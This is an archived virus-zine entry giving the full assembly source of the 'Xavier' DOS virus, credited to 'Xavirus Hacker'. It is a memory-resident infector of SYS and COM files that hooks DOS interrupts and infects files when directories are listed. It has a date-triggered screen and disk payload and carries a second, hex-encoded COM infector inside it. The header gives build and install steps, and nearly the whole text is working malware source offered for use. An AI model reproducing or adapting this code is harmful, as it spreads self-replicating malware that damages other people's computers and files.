Copy Link
Add to Bookmark
Report
SLAM3.013: The Xavier Virus by Xavirus Hacker
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; V I R U S ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;€; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; € € ‹flflfl‹ € € € ‹flflflflflfl fl€flflflflfl‹ €; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; € € € € € € € € € € €; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; fl€fl € € € € € €flflflfl € € €; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; ‹€‹ €flflfl€ € € € € €‹‹‹‹fl €; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; € € € € € € € € € € €; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; € € € € € € fl‹‹‹‹‹ € € fl; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; MADE IN LUQUE, PARAGUAY. By Xavirus Hacker ‹; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;
; ; ; TSR infector of SYS/COM programs. ; ; ; ; ; ;
; ; ; Infects when a operation with FCB is made (DIR,COPY,etc.) ; ; ; ; ; ;
; ; ; The victim is opened in read only mode, then is turned ; ; ; ; ; ;
; ; ; into read/write mode, and the attributes are kicked. ; ; ; ; ; ;
; ; ; Bestial & psycodelic payload on september 13. ; ; ; ; ; ;
; ; ; Time/Date/Attributes preserved. ; ; ; ; ; ;
; ; ; Doesn't reinfects SYS or COM files (hehehehehe). ; ; ; ; ; ;
; ; ; With thanx to Dark Angel. ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; ; ; How to make the virus work: ; ; ; ; ; ; ; ; ; ; ; ; ; ;
; ; ; ; ; ; ; ; ; Tasm Xavier.Asm * Tlink Xavier.Obj ; ; ; ; ; ; ; ; ; ; ; ;
; ; ; ; ; ; Exe2Bin Xavier.Exe * Ren Xavier.Bin Xavier.Sys; ; ; ; ; ; ; ; ; ;
; ; ; ; ; Load it as device in your config.sys and that all.; ; ; ; ; ; ; ; ;
.MODEL TINY
.CODE
ORG 0h
Cabecera:
Siguiente_Cabecera dw 0ffffh,0ffffh
Atributo dw 8000h
restrategica dw offset Estrategica
rinterrupt dw offset Interrupcion
BautizadoComo db 'XAVIER! '
FinDeCabecera:
Estrategica:
Push bp
Call DeltaEstrategica
DeltaEstrategica:
Pop bp
Mov cs:[bp+offset GuardarBX-offset DeltaEstrategica],bx
Mov cs:[bp+offset GuardarES-offset DeltaEstrategica],es
Pop bp
retf
Puente:
Jmp SalirInterrupcion
Interrupcion:
Push bp
Push ax
Push bx
Push cx
Push dx
Push ds
Push es
Push si
Push cs
Pop ds
Call DeltaInterrupcion
DeltaInterrupcion:
Pop bp
Les bx,cs:[bp+GuardarBX-DeltaInterrupcion]
Mov es:[bx+3],8103h
Cmp Byte ptr es:[bx+2],0
Jnz Puente
Mov es:[bx+10h],cs
Lea si,[bp+Cabecera-DeltaInterrupcion]
Mov es:[bx+0eh],si
Dec Byte ptr es:[bx+3]
Mov ax,'XA'
Int 21h
Cmp cx,'V!'
Jz Puente
Add Word ptr es:[bx+0eh],offset FinMonton
Mov es:[bx+3],0100h
Mov ax,03521h
Int 21h
Mov Word ptr cs:[bp+Vieja21h-DeltaInterrupcion],bx
Mov Word ptr cs:[bp+Vieja21h+2-DeltaInterrupcion],es
Lea dx,[bp+Interrupcion21h-DeltaInterrupcion]
Push cs
Pop ds
Mov ax,02521h
Int 21h
Mov ah,2ah
Int 21h
Cmp dh,09
Jne SalirInterrupcion
Cmp dl,13d
Jne SalirInterrupcion
in al,21h
or al,02
out 21h,al
Mov ax,0013h
Int 010h
Sub ax,ax
Mov ds,ax
Xor si,si
Blink:
Mov bx,0417h
Mov Byte ptr [bx],16d
Call Retardo
Mov Byte ptr [bx],32d
Call Retardo
Mov Byte ptr [bx],64d
Call Retardo
Push bx
Push ds
Push cs
Pop ds
Mov ax,0201h
Lea bx,bp+FinMonton
Mov cx,0202
Mov dh,1
Mov dl,1
Int 13h
Mov ax,0201h
Mov dl,0
Int 13h
Pop ds
Pop bx
Inc si
Cmp si,255
jbe Here
Xor si,si
Here:
Mov di,0a000h
Mov es,di
Mov cx,65535d
Mov ax,si
Repe Stosb
Loop Blink
Retardo:
Mov ah,01h
Int 16h
Mov cx,30000d
Pausa:
in al,4Fh
Loop Pausa
ret
SalirInterrupcion:
Pop si
Pop es
Pop ds
Pop dx
Pop cx
Pop bx
Pop ax
Pop bp
retf
db ' [XAVIER!] by Xavirus Hacker '
Interrupcion21h:
Cmp ax,'XA'
Jnz ContinuarInt21h
Mov cx,'V!'
SalirInt21h:
iret
db 'XH'
ContinuarInt21h:
Pushf
db 09ah
Vieja21h dw 0,0
Pushf
Push bp
Push ax
Mov bp,sp
Mov ax,[bp+4]
Mov [bp+10],ax
Pop ax
Pop bp
Popf
Cmp ah,11h
Je UsanFileControlBlock
Cmp ah,12h
Je UsanFileControlBlock
iret
UsanFileControlBlock:
Cmp al,0ffh
Je SalirInt21h
Push bp
Call OtroDelta
OtroDelta:
Pop bp
Sub bp,offset OtroDelta
Push ax
Push bx
Push cx
Push dx
Push ds
Push es
Push si
Push di
Mov ah,2fh
Int 21h
Cmp Byte ptr es:[bx],0ffh
Jnz FCBnormal
Add bx,0007h
FCBnormal:
Mov cx,es:[bx+1dh]
Mov cs:[bp+Grandor],cx
Push es
Pop ds
Push cs
Pop es
cld
Lea di,bp+Victima
Mov si,bx
Inc si
Mov cx,0008h
Seguir:
Cmp Byte ptr ds:[si],20h
Jz Termino
Movsb
loop Seguir
Termino:
Mov al,"."
Stosb
Lea si,[bx+9]
Mov ax,'YS'
Cmp Word ptr [si],ax
Jne PuedeSerCOM
stosw
Cmp Byte ptr [si+2],al
Jne RetornoDeLaInt21h
Stosb
Xor cx,cx
Jmp short surivaX
PuedeSerCOM:
Mov ax,'OC'
Cmp Word ptr [si],ax
Jne RetornoDeLaInt21h
stosw
Mov al,'M'
Cmp Byte ptr [si+2],al
Jne RetornoDeLaInt21h
Stosb
Mov cx,32d
surivaX:
Xor ax,ax
Stosb
Push cs
Pop ds
Mov di,cx
Mov ax,3d00h
Lea dx,bp+Victima
Int 21h
xchg bx,ax ; This takes just 1 byte: XCHG AX,BX takes 2!
jc RetornoDeLaInt21h
Mov ah,3fh
Mov cx,0003d
Lea dx,bp+buffer
Int 21h
Cmp Word ptr ds:[bp+buffer],'MZ'
Je Vamos
Cmp Word ptr ds:[bp+buffer],'ZM'
Je Vamos
Cmp di,32d
Je Revisar
Inc Word ptr ds:[bp+buffer]
Jz Putrefaccion
Jmp short Vamos
Revisar:
Cmp Byte ptr ds:[bp+buffer],0e9h
Jne PudrirCOM
Vamos:
Mov ah,3eh
Int 21h
RetornoDeLaInt21h:
Pop di
Pop si
Pop es
Pop ds
Pop dx
Pop cx
Pop bx
Pop ax
Pop bp
iret
Putrefaccion:
Jmp PudrirSYS
PudrirCOM:
Push ds
Pop es
Call ModificarSFT
Mov ax,5700h
Int 21h
Push cx
Push dx
Mov ax,4202h
cwd
Xor cx,cx
Int 21h
Sub ax,3
Mov Word ptr ds:[bp+Salto+1],ax
Lea dx,bp+VirusXavier
Mov ah,40h
Mov cx,016fh
Int 21h
Mov ax,4200h
Sub dx,dx
Sub cx,cx
Int 21h
Lea dx,bp+Salto
Mov ah,40h
Mov cx,3
Int 21h
Call Restoring
Pop dx
Pop cx
and cl,11100000b
or cl,00011111b
Mov ax,5701h
Int 21h
Jmp Vamos
ModificarSFT:
Push bx
Mov ax,1220h
Int 2fh
Mov ax,1216h
Xor bh,bh
Mov bl,es:[di]
Int 2fh
Mov cl,Byte ptr es:[di+4]
Mov Byte ptr cs:[bp+FileAtributo],cl
Mov Byte ptr es:[di+4],20h
Mov Byte ptr es:[di+2],02
Mov Word ptr es:[di+015h],00
Mov Word ptr es:[di+017h],00
Pop bx
ret
Restoring:
Mov cl,Byte ptr cs:[bp+FileAtributo]
Mov Byte ptr es:[di+4],cl
ret
PudrirSYS:
Push ds
Pop es
Mov Word ptr ds:[bp+NuevaCabecera+4],8000h
Mov cx,cs:[bp+Grandor]
Add cx,(offset Estrategica-offset Cabecera)
Mov Word ptr ds:[bp+NuevaCabecera+6],cx
Add cx,(offset Interrupcion-offset Estrategica)
Mov Word ptr cs:[bp+NuevaCabecera+8],cx
Mov Word ptr cs:[bp+NuevaCabecera+0],0ffffh
Mov Word ptr cs:[bp+NuevaCabecera+2],0ffffh
Call ModificarSFT
Mov ax,5700h
Int 21h
Push cx
Push dx
Mov ah,40h
Mov cx,0002
Lea dx,bp+Grandor
Int 21h
Mov ax,4202h
Xor cx,cx
cwd
Int 21h
Mov ah,40h
Mov cx,18d
Lea dx,bp+NuevaCabecera
Int 21h
Mov ah,40h
Mov cx,(offset Monton-offset FinDeCabecera)
Lea dx,bp+FinDeCabecera
Int 21h
Call Restoring
Pop dx
Pop cx
Mov ax,5701h
Int 21h
Jmp Vamos
VirusXavier: ; 016f bytes, virus to be dropped. TSR (IVT) COM fast infector.
db 0e8h,000h,000h,05dh,081h,0edh,003h,001h,033h,0c9h,08eh,0c1h,0fch,026h,081h,03eh
db 004h,002h,081h,0edh,074h,02ch,0b8h,021h,035h,0cdh,021h,08ch,086h,07eh,001h,089h
db 09eh,07ch,001h,033h,0d2h,0bfh,000h,002h,08eh,0c2h,0b9h,06fh,001h,08dh,0b6h,000h
db 001h,0f3h,0a4h,0cch,006h,01fh,0b8h,021h,025h,0bah,05bh,002h,0cdh,021h,033h,0c0h
db 033h,0d2h,02bh,0dbh,00eh,00eh,01fh,007h,08bh,0cbh,0bfh,000h,001h,08dh,0b6h,061h
db 002h,057h,0a4h,0a5h,02bh,0ffh,033h,0edh,02bh,0f6h,0c3h,09ch,03dh,000h,03dh,074h
db 025h,03dh,001h,03dh,074h,020h,080h,0fch,04bh,074h,01bh,080h,0fch,041h,074h,016h
db 080h,0fch,043h,074h,011h,080h,0fch,056h,074h,00ch,09dh,0eah,000h,000h,000h,000h
db 0b0h,003h,0cfh,0e9h,0b5h,000h,050h,053h,051h,052h,056h,057h,01eh,006h,052h,01eh
db 0b8h,024h,035h,0cdh,021h,02eh,08ch,006h,066h,003h,02eh,089h,01eh,064h,003h,00eh
db 01fh,0b8h,024h,025h,0bah,080h,002h,0cdh,021h,01fh,05ah,01eh,007h,0fch,08bh,0fah
db 0b9h,07dh,000h,0b0h,02eh,0f2h,0aeh,075h,0cah,087h,0f7h,0adh,00dh,020h,020h,03dh
db 063h,06fh,075h,077h,0ach,00ch,020h,03ch,06dh,075h,070h,0b8h,002h,03dh,0cdh,021h
db 072h,069h,093h,00eh,00eh,01fh,007h,0b8h,000h,057h,0cdh,021h,089h,016h,02ah,003h
db 089h,00eh,02dh,003h,080h,0e1h,01fh,080h,0f9h,01fh,074h,04bh,0b4h,03fh,0bah,061h
db 003h,0b9h,003h,000h,0cdh,021h,08bh,0f2h,08bh,004h,002h,0e0h,080h,0fch,0a7h,074h
db 036h,0e8h,051h,000h,03dh,000h,0fah,073h,02eh,02dh,003h,000h,0a3h,05fh,003h,0b4h
db 040h,0bah,000h,002h,0b9h,06fh,001h,0cdh,021h,0e8h,034h,000h,0bah,05eh,003h,0b4h
db 040h,0b9h,003h,000h,0cdh,021h,0b8h,001h,057h,0bah,000h,000h,0b9h,000h,000h,080h
db 0e1h,0e0h,080h,0c9h,01fh,0cdh,021h,0b4h,03eh,0cdh,021h,02eh,0c5h,016h,064h,003h
db 0b8h,024h,025h,0cdh,021h,007h,01fh,05fh,05eh,05ah,059h,05bh,058h,0e9h,02ah,0ffh
db 0b8h,000h,042h,0ebh,003h,0b8h,002h,042h,02bh,0c9h,099h,0cdh,021h,0c3h
Salto db 0e9h,000h,000h
Buffer db 090h,0cdh,020h,000h,000h,000h,000h
BeastName db 'XAVIER!'
Monton:
Victima db 13d dup (0)
NuevaCabecera db 10d dup (0)
Grandor dw 01d dup (0)
FileAtributo db 0
GuardarBX dw 0
GuardarES dw 0
Hora dw 0
Fecha dw 0
FinMonton:
End